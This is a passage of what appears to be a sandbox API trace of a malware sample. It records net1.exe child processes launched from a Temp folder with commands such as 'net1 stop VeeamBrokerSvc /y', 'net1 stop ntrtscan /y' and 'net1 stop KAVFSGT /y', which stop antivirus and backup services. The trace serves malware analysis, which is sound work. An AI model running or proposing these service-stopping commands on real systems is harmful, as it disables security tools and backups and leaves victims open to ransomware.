(_String1="lanmanworkstation", _String2="NTRTSCAN") returned -2 [0120.868] _wcsicmp (_String1="server", _String2="NTRTSCAN") returned 5 [0120.868] _wcsicmp (_String1="svr", _String2="NTRTSCAN") returned 5 [0120.868] _wcsicmp (_String1="srv", _String2="NTRTSCAN") returned 5 [0120.868] _wcsicmp (_String1="lanmanserver", _String2="NTRTSCAN") returned -2 [0120.868] _wcsicmp (_String1="alerter", _String2="NTRTSCAN") returned -13 [0120.868] _wcsicmp (_String1="netlogon", _String2="NTRTSCAN") returned -15 [0120.869] NetServiceControl (in: servername=0x0, service="NTRTSCAN", opcode=0x0, arg=0x0, bufptr=0x12fe64 | out: bufptr=0x12fe64) returned 0x889 [0120.870] wcscpy_s (in: _Destination=0x39a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0120.870] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74860000 [0120.871] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74860000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x39b338, nSize=0x800, Arguments=0x399dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0120.873] GetFileType (hFile=0x0) returned 0x0 [0120.873] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x7a3ec0 [0120.873] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x7a3ec0, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0120.873] WriteFile (in: hFile=0x0, lpBuffer=0x7a3ec0, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x12fda4, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fda4, lpOverlapped=0x0) returned 0 [0120.873] LocalFree (hMem=0x7a3ec0) returned 0x0 [0120.873] GetFileType (hFile=0x0) returned 0x0 [0120.873] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x7a6170 [0120.873] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x7a6170, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nz", lpUsedDefaultChar=0x0) returned 2 [0120.873] WriteFile (in: hFile=0x0, lpBuffer=0x7a6170, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x12fda4, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fda4, lpOverlapped=0x0) returned 0 [0120.873] LocalFree (hMem=0x7a6170) returned 0x0 [0120.873] _ultow (in: _Dest=0x889, _Radix=1244628 | out: _Dest=0x889) returned="2185" [0120.873] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74860000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x39b338, nSize=0x800, Arguments=0x399dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0120.874] GetFileType (hFile=0x0) returned 0x0 [0120.874] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x7a6170 [0120.874] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x7a6170, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0120.874] WriteFile (in: hFile=0x0, lpBuffer=0x7a6170, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x12fdb0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fdb0, lpOverlapped=0x0) returned 0 [0120.874] LocalFree (hMem=0x7a6170) returned 0x0 [0120.874] GetFileType (hFile=0x0) returned 0x0 [0120.874] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x7a6170 [0120.874] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x7a6170, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nz", lpUsedDefaultChar=0x0) returned 2 [0120.874] WriteFile (in: hFile=0x0, lpBuffer=0x7a6170, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x12fdb0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fdb0, lpOverlapped=0x0) returned 0 [0120.874] LocalFree (hMem=0x7a6170) returned 0x0 [0120.875] NetApiBufferFree (Buffer=0x7a1ae0) returned 0x0 [0120.875] NetApiBufferFree (Buffer=0x7a1af8) returned 0x0 [0120.875] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ntrtscan /y" [0120.875] exit (_Code=2) Process: id = "244" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x626c5000" os_pid = "0x1090" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "121" os_parent_pid = "0xda0" cmd_line = "C:\\Windows\\system32\\net1 stop VeeamBrokerSvc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 638 os_tid = 0x11a8 [0120.347] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2cfcfc | out: lpSystemTimeAsFileTime=0x2cfcfc*(dwLowDateTime=0x1b783470, dwHighDateTime=0x1d6f0d1)) [0120.348] GetCurrentProcessId () returned 0x1090 [0120.348] GetCurrentThreadId () returned 0x11a8 [0120.348] GetTickCount () returned 0x11515c3 [0120.348] QueryPerformanceCounter (in: lpPerformanceCount=0x2cfcf4 | out: lpPerformanceCount=0x2cfcf4*=23944848084) returned 1 [0120.348] GetModuleHandleA (lpModuleName=0x0) returned 0x380000 [0120.348] __set_app_type (_Type=0x1) [0120.348] __p__fmode () returned 0x770331f4 [0120.348] __p__commode () returned 0x770331fc [0120.348] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x38ffe6) returned 0x0 [0120.348] __getmainargs (in: _Argc=0x399064, _Argv=0x39906c, _Env=0x399068, _DoWildCard=0, _StartInfo=0x399024 | out: _Argc=0x399064, _Argv=0x39906c, _Env=0x399068) returned 0 [0120.348] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0120.348] GetConsoleOutputCP () returned 0x1b5 [0120.349] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x399080 | out: lpCPInfo=0x399080) returned 1 [0120.349] SetThreadUILanguage (LangId=0x0) returned 0x409 [0120.352] sprintf_s (in: _DstBuf=0x2cfcb4, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0120.352] setlocale (category=0, locale=".437") returned="English_United States.437" [0120.354] GetStdHandle (nStdHandle=0xfffffff5) returned 0x470 [0120.354] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0120.354] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop VeeamBrokerSvc /y" [0120.354] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2cfa80, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0120.354] RtlAllocateHeap (HeapHandle=0x7d0000, Flags=0x0, Size=0x70) returned 0x7e3ae0 [0120.355] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0120.355] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2cfc84 | out: Buffer=0x2cfc84*=0x7e1ae8) returned 0x0 [0120.355] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2cfc84 | out: Buffer=0x2cfc84*=0x7e1b00) returned 0x0 [0120.355] _fileno (_File=0x77032900) returned -2 [0120.355] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0120.355] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0120.355] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0120.355] _wcsicmp (_String1="config", _String2="stop") returned -16 [0120.355] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0120.355] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0120.355] _wcsicmp (_String1="file", _String2="stop") returned -13 [0120.355] _wcsicmp (_String1="files", _String2="stop") returned -13 [0120.355] _wcsicmp (_String1="group", _String2="stop") returned -12 [0120.355] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0120.355] _wcsicmp (_String1="help", _String2="stop") returned -11 [0120.355] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0120.355] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0120.355] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0120.355] _wcsicmp (_String1="session", _String2="stop") returned -15 [0120.355] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0120.355] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0120.355] _wcsicmp (_String1="share", _String2="stop") returned -12 [0120.355] _wcsicmp (_String1="start", _String2="stop") returned -14 [0120.355] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0120.355] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0120.356] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0120.356] _wcsicmp (_String1="accounts", _String2="VeeamBrokerSvc") returned -21 [0120.356] _wcsicmp (_String1="computer", _String2="VeeamBrokerSvc") returned -19 [0120.356] _wcsicmp (_String1="config", _String2="VeeamBrokerSvc") returned -19 [0120.356] _wcsicmp (_String1="continue", _String2="VeeamBrokerSvc") returned -19 [0120.356] _wcsicmp (_String1="cont", _String2="VeeamBrokerSvc") returned -19 [0120.356] _wcsicmp (_String1="file", _String2="VeeamBrokerSvc") returned -16 [0120.356] _wcsicmp (_String1="files", _String2="VeeamBrokerSvc") returned -16 [0120.356] _wcsicmp (_String1="group", _String2="VeeamBrokerSvc") returned -15 [0120.356] _wcsicmp (_String1="groups", _String2="VeeamBrokerSvc") returned -15 [0120.356] _wcsicmp (_String1="help", _String2="VeeamBrokerSvc") returned -14 [0120.356] _wcsicmp (_String1="helpmsg", _String2="VeeamBrokerSvc") returned -14 [0120.356] _wcsicmp (_String1="localgroup", _String2="VeeamBrokerSvc") returned -10 [0120.356] _wcsicmp (_String1="pause", _String2="VeeamBrokerSvc") returned -6 [0120.356] _wcsicmp (_String1="session", _String2="VeeamBrokerSvc") returned -3 [0120.356] _wcsicmp (_String1="sessions", _String2="VeeamBrokerSvc") returned -3 [0120.356] _wcsicmp (_String1="sess", _String2="VeeamBrokerSvc") returned -3 [0120.356] _wcsicmp (_String1="share", _String2="VeeamBrokerSvc") returned -3 [0120.356] _wcsicmp (_String1="start", _String2="VeeamBrokerSvc") returned -3 [0120.356] _wcsicmp (_String1="stats", _String2="VeeamBrokerSvc") returned -3 [0120.356] _wcsicmp (_String1="statistics", _String2="VeeamBrokerSvc") returned -3 [0120.356] _wcsicmp (_String1="stop", _String2="VeeamBrokerSvc") returned -3 [0120.356] _wcsicmp (_String1="time", _String2="VeeamBrokerSvc") returned -2 [0120.356] _wcsicmp (_String1="user", _String2="VeeamBrokerSvc") returned -1 [0120.356] _wcsicmp (_String1="users", _String2="VeeamBrokerSvc") returned -1 [0120.356] _wcsicmp (_String1="msg", _String2="VeeamBrokerSvc") returned -9 [0120.356] _wcsicmp (_String1="messenger", _String2="VeeamBrokerSvc") returned -9 [0120.356] _wcsicmp (_String1="receiver", _String2="VeeamBrokerSvc") returned -4 [0120.356] _wcsicmp (_String1="rcv", _String2="VeeamBrokerSvc") returned -4 [0120.356] _wcsicmp (_String1="netpopup", _String2="VeeamBrokerSvc") returned -8 [0120.356] _wcsicmp (_String1="redirector", _String2="VeeamBrokerSvc") returned -4 [0120.356] _wcsicmp (_String1="redir", _String2="VeeamBrokerSvc") returned -4 [0120.356] _wcsicmp (_String1="rdr", _String2="VeeamBrokerSvc") returned -4 [0120.356] _wcsicmp (_String1="workstation", _String2="VeeamBrokerSvc") returned 1 [0120.356] _wcsicmp (_String1="work", _String2="VeeamBrokerSvc") returned 1 [0120.356] _wcsicmp (_String1="wksta", _String2="VeeamBrokerSvc") returned 1 [0120.357] _wcsicmp (_String1="prdr", _String2="VeeamBrokerSvc") returned -6 [0120.357] _wcsicmp (_String1="devrdr", _String2="VeeamBrokerSvc") returned -18 [0120.357] _wcsicmp (_String1="lanmanworkstation", _String2="VeeamBrokerSvc") returned -10 [0120.357] _wcsicmp (_String1="server", _String2="VeeamBrokerSvc") returned -3 [0120.357] _wcsicmp (_String1="svr", _String2="VeeamBrokerSvc") returned -3 [0120.357] _wcsicmp (_String1="srv", _String2="VeeamBrokerSvc") returned -3 [0120.357] _wcsicmp (_String1="lanmanserver", _String2="VeeamBrokerSvc") returned -10 [0120.357] _wcsicmp (_String1="alerter", _String2="VeeamBrokerSvc") returned -21 [0120.357] _wcsicmp (_String1="netlogon", _String2="VeeamBrokerSvc") returned -8 [0120.357] _wcsupr (in: _String="VeeamBrokerSvc" | out: _String="VEEAMBROKERSVC") returned="VEEAMBROKERSVC" [0120.357] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x7e54b0 [0120.877] GetServiceKeyNameW (in: hSCManager=0x7e54b0, lpDisplayName="VEEAMBROKERSVC", lpServiceName=0x39aaf0, lpcchBuffer=0x2cfc20 | out: lpServiceName="", lpcchBuffer=0x2cfc20) returned 0 [0120.878] _wcsicmp (_String1="msg", _String2="VEEAMBROKERSVC") returned -9 [0120.878] _wcsicmp (_String1="messenger", _String2="VEEAMBROKERSVC") returned -9 [0120.878] _wcsicmp (_String1="receiver", _String2="VEEAMBROKERSVC") returned -4 [0120.878] _wcsicmp (_String1="rcv", _String2="VEEAMBROKERSVC") returned -4 [0120.878] _wcsicmp (_String1="redirector", _String2="VEEAMBROKERSVC") returned -4 [0120.878] _wcsicmp (_String1="redir", _String2="VEEAMBROKERSVC") returned -4 [0120.878] _wcsicmp (_String1="rdr", _String2="VEEAMBROKERSVC") returned -4 [0120.878] _wcsicmp (_String1="workstation", _String2="VEEAMBROKERSVC") returned 1 [0120.878] _wcsicmp (_String1="work", _String2="VEEAMBROKERSVC") returned 1 [0120.878] _wcsicmp (_String1="wksta", _String2="VEEAMBROKERSVC") returned 1 [0120.879] _wcsicmp (_String1="prdr", _String2="VEEAMBROKERSVC") returned -6 [0120.879] _wcsicmp (_String1="devrdr", _String2="VEEAMBROKERSVC") returned -18 [0120.879] _wcsicmp (_String1="lanmanworkstation", _String2="VEEAMBROKERSVC") returned -10 [0120.879] _wcsicmp (_String1="server", _String2="VEEAMBROKERSVC") returned -3 [0120.879] _wcsicmp (_String1="svr", _String2="VEEAMBROKERSVC") returned -3 [0120.879] _wcsicmp (_String1="srv", _String2="VEEAMBROKERSVC") returned -3 [0120.879] _wcsicmp (_String1="lanmanserver", _String2="VEEAMBROKERSVC") returned -10 [0120.879] _wcsicmp (_String1="alerter", _String2="VEEAMBROKERSVC") returned -21 [0120.879] _wcsicmp (_String1="netlogon", _String2="VEEAMBROKERSVC") returned -8 [0120.879] NetServiceControl (in: servername=0x0, service="VEEAMBROKERSVC", opcode=0x0, arg=0x0, bufptr=0x2cfc1c | out: bufptr=0x2cfc1c) returned 0x889 [0120.881] wcscpy_s (in: _Destination=0x39a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0120.881] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74860000 [0120.881] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74860000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x39b338, nSize=0x800, Arguments=0x399dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0120.883] GetFileType (hFile=0x0) returned 0x0 [0120.883] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x7e3ed0 [0120.883] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x7e3ed0, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0120.883] WriteFile (in: hFile=0x0, lpBuffer=0x7e3ed0, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x2cfb5c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2cfb5c, lpOverlapped=0x0) returned 0 [0120.883] LocalFree (hMem=0x7e3ed0) returned 0x0 [0120.883] GetFileType (hFile=0x0) returned 0x0 [0120.883] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x7e6178 [0120.883] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x7e6178, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n~", lpUsedDefaultChar=0x0) returned 2 [0120.883] WriteFile (in: hFile=0x0, lpBuffer=0x7e6178, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2cfb5c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2cfb5c, lpOverlapped=0x0) returned 0 [0120.883] LocalFree (hMem=0x7e6178) returned 0x0 [0120.883] _ultow (in: _Dest=0x889, _Radix=2947980 | out: _Dest=0x889) returned="2185" [0120.883] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74860000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x39b338, nSize=0x800, Arguments=0x399dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0120.883] GetFileType (hFile=0x0) returned 0x0 [0120.883] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x7e6178 [0120.883] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x7e6178, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0120.883] WriteFile (in: hFile=0x0, lpBuffer=0x7e6178, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x2cfb68, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2cfb68, lpOverlapped=0x0) returned 0 [0120.883] LocalFree (hMem=0x7e6178) returned 0x0 [0120.883] GetFileType (hFile=0x0) returned 0x0 [0120.883] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x7e6178 [0120.883] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x7e6178, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n~", lpUsedDefaultChar=0x0) returned 2 [0120.883] WriteFile (in: hFile=0x0, lpBuffer=0x7e6178, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2cfb68, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2cfb68, lpOverlapped=0x0) returned 0 [0120.884] LocalFree (hMem=0x7e6178) returned 0x0 [0120.884] NetApiBufferFree (Buffer=0x7e1ae8) returned 0x0 [0120.884] NetApiBufferFree (Buffer=0x7e1b00) returned 0x0 [0120.884] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop VeeamBrokerSvc /y" [0120.884] exit (_Code=2) Process: id = "245" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x5fea0000" os_pid = "0xc3c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "117" os_parent_pid = "0xae0" cmd_line = "C:\\Windows\\system32\\net1 stop KAVFSGT /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 639 os_tid = 0xc84 [0120.382] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xef9bc | out: lpSystemTimeAsFileTime=0xef9bc*(dwLowDateTime=0x1b7cf730, dwHighDateTime=0x1d6f0d1)) [0120.382] GetCurrentProcessId () returned 0xc3c [0120.382] GetCurrentThreadId () returned 0xc84 [0120.382] GetTickCount () returned 0x11515e2 [0120.382] QueryPerformanceCounter (in: lpPerformanceCount=0xef9b4 | out: lpPerformanceCount=0xef9b4*=23948266567) returned 1 [0120.382] GetModuleHandleA (lpModuleName=0x0) returned 0x380000 [0120.382] __set_app_type (_Type=0x1) [0120.382] __p__fmode () returned 0x770331f4 [0120.382] __p__commode () returned 0x770331fc [0120.382] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x38ffe6) returned 0x0 [0120.383] __getmainargs (in: _Argc=0x399064, _Argv=0x39906c, _Env=0x399068, _DoWildCard=0, _StartInfo=0x399024 | out: _Argc=0x399064, _Argv=0x39906c, _Env=0x399068) returned 0 [0120.383] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0120.383] GetConsoleOutputCP () returned 0x1b5 [0120.383] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x399080 | out: lpCPInfo=0x399080) returned 1 [0120.383] SetThreadUILanguage (LangId=0x0) returned 0x409 [0120.386] sprintf_s (in: _DstBuf=0xef974, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0120.386] setlocale (category=0, locale=".437") returned="English_United States.437" [0120.388] GetStdHandle (nStdHandle=0xfffffff5) returned 0x470 [0120.388] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0120.388] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop KAVFSGT /y" [0120.388] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xef740, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0120.389] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x62) returned 0x6e3ad0 [0120.389] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0120.389] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0xef944 | out: Buffer=0xef944*=0x6e1ad8) returned 0x0 [0120.389] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0xef944 | out: Buffer=0xef944*=0x6e1af0) returned 0x0 [0120.389] _fileno (_File=0x77032900) returned -2 [0120.389] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0120.389] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0120.389] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0120.389] _wcsicmp (_String1="config", _String2="stop") returned -16 [0120.389] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0120.389] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0120.389] _wcsicmp (_String1="file", _String2="stop") returned -13 [0120.389] _wcsicmp (_String1="files", _String2="stop") returned -13 [0120.389] _wcsicmp (_String1="group", _String2="stop") returned -12 [0120.389] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0120.389] _wcsicmp (_String1="help", _String2="stop") returned -11 [0120.389] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0120.389] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0120.389] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0120.389] _wcsicmp (_String1="session", _String2="stop") returned -15 [0120.389] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0120.389] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0120.389] _wcsicmp (_String1="share", _String2="stop") returned -12 [0120.389] _wcsicmp (_String1="start", _String2="stop") returned -14 [0120.390] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0120.390] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0120.390] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0120.390] _wcsicmp (_String1="accounts", _String2="KAVFSGT") returned -10 [0120.390] _wcsicmp (_String1="computer", _String2="KAVFSGT") returned -8 [0120.390] _wcsicmp (_String1="config", _String2="KAVFSGT") returned -8 [0120.390] _wcsicmp (_String1="continue", _String2="KAVFSGT") returned -8 [0120.390] _wcsicmp (_String1="cont", _String2="KAVFSGT") returned -8 [0120.390] _wcsicmp (_String1="file", _String2="KAVFSGT") returned -5 [0120.390] _wcsicmp (_String1="files", _String2="KAVFSGT") returned -5 [0120.390] _wcsicmp (_String1="group", _String2="KAVFSGT") returned -4 [0120.390] _wcsicmp (_String1="groups", _String2="KAVFSGT") returned -4 [0120.390] _wcsicmp (_String1="help", _String2="KAVFSGT") returned -3 [0120.390] _wcsicmp (_String1="helpmsg", _String2="KAVFSGT") returned -3 [0120.390] _wcsicmp (_String1="localgroup", _String2="KAVFSGT") returned 1 [0120.390] _wcsicmp (_String1="pause", _String2="KAVFSGT") returned 5 [0120.390] _wcsicmp (_String1="session", _String2="KAVFSGT") returned 8 [0120.390] _wcsicmp (_String1="sessions", _String2="KAVFSGT") returned 8 [0120.390] _wcsicmp (_String1="sess", _String2="KAVFSGT") returned 8 [0120.390] _wcsicmp (_String1="share", _String2="KAVFSGT") returned 8 [0120.390] _wcsicmp (_String1="start", _String2="KAVFSGT") returned 8 [0120.390] _wcsicmp (_String1="stats", _String2="KAVFSGT") returned 8 [0120.390] _wcsicmp (_String1="statistics", _String2="KAVFSGT") returned 8 [0120.390] _wcsicmp (_String1="stop", _String2="KAVFSGT") returned 8 [0120.390] _wcsicmp (_String1="time", _String2="KAVFSGT") returned 9 [0120.390] _wcsicmp (_String1="user", _String2="KAVFSGT") returned 10 [0120.390] _wcsicmp (_String1="users", _String2="KAVFSGT") returned 10 [0120.390] _wcsicmp (_String1="msg", _String2="KAVFSGT") returned 2 [0120.390] _wcsicmp (_String1="messenger", _String2="KAVFSGT") returned 2 [0120.390] _wcsicmp (_String1="receiver", _String2="KAVFSGT") returned 7 [0120.390] _wcsicmp (_String1="rcv", _String2="KAVFSGT") returned 7 [0120.390] _wcsicmp (_String1="netpopup", _String2="KAVFSGT") returned 3 [0120.390] _wcsicmp (_String1="redirector", _String2="KAVFSGT") returned 7 [0120.390] _wcsicmp (_String1="redir", _String2="KAVFSGT") returned 7 [0120.390] _wcsicmp (_String1="rdr", _String2="KAVFSGT") returned 7 [0120.390] _wcsicmp (_String1="workstation", _String2="KAVFSGT") returned 12 [0120.390] _wcsicmp (_String1="work", _String2="KAVFSGT") returned 12 [0120.391] _wcsicmp (_String1="wksta", _String2="KAVFSGT") returned 12 [0120.391] _wcsicmp (_String1="prdr", _String2="KAVFSGT") returned 5 [0120.391] _wcsicmp (_String1="devrdr", _String2="KAVFSGT") returned -7 [0120.391] _wcsicmp (_String1="lanmanworkstation", _String2="KAVFSGT") returned 1 [0120.391] _wcsicmp (_String1="server", _String2="KAVFSGT") returned 8 [0120.391] _wcsicmp (_String1="svr", _String2="KAVFSGT") returned 8 [0120.391] _wcsicmp (_String1="srv", _String2="KAVFSGT") returned 8 [0120.391] _wcsicmp (_String1="lanmanserver", _String2="KAVFSGT") returned 1 [0120.391] _wcsicmp (_String1="alerter", _String2="KAVFSGT") returned -10 [0120.391] _wcsicmp (_String1="netlogon", _String2="KAVFSGT") returned 3 [0120.391] _wcsupr (in: _String="KAVFSGT" | out: _String="KAVFSGT") returned="KAVFSGT" [0120.391] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x6e5498 [0120.886] GetServiceKeyNameW (in: hSCManager=0x6e5498, lpDisplayName="KAVFSGT", lpServiceName=0x39aaf0, lpcchBuffer=0xef8e0 | out: lpServiceName="", lpcchBuffer=0xef8e0) returned 0 [0120.886] _wcsicmp (_String1="msg", _String2="KAVFSGT") returned 2 [0120.887] _wcsicmp (_String1="messenger", _String2="KAVFSGT") returned 2 [0120.887] _wcsicmp (_String1="receiver", _String2="KAVFSGT") returned 7 [0120.887] _wcsicmp (_String1="rcv", _String2="KAVFSGT") returned 7 [0120.887] _wcsicmp (_String1="redirector", _String2="KAVFSGT") returned 7 [0120.887] _wcsicmp (_String1="redir", _String2="KAVFSGT") returned 7 [0120.887] _wcsicmp 